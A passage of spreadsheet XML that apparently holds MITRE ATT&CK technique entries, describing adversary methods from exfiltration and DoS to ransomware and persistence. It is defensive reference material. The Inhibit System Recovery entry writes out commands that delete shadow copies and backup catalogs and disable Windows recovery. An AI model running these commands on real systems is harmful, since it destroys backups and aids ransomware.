The Linux &amp; macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)
The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft DLL)</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  
Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 
[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux &lt;code&gt;curl&lt;/code&gt; may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)
Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.
Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.
A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as &lt;code&gt;del&lt;/code&gt; and &lt;code&gt;rm&lt;/code&gt; often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) 
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>Disk Wipe</t>
  </si>
  <si>
    <t>Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)</t>
  </si>
  <si>
    <t>T1657</t>
  </si>
  <si>
    <t>Financial Theft</t>
  </si>
  <si>
    <t>Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) 
Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)
Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)
Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;
* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;
* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;
* &lt;code&gt;REAgentC.exe&lt;/code&gt; can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.
Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.
For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)
Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as &lt;code&gt;MSExchangeIS&lt;/code&gt;, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. &lt;code&gt;reload&lt;/code&gt;).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)
In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.
Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019)
Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.(Citation: Dropbox Malware Sync)</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Internal Image</t>
  </si>
  <si>
    <t>Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)</t>
  </si>
  <si>
    <t>T1653</t>
  </si>
  <si>
    <t>Power Settings</t>
  </si>
  <si>
    <t>Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: systemdsleep Linux)
For example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android Users) Adversaries may also extend system lock screen timeout settings.(Citation: BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware Loader Campaign)
Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
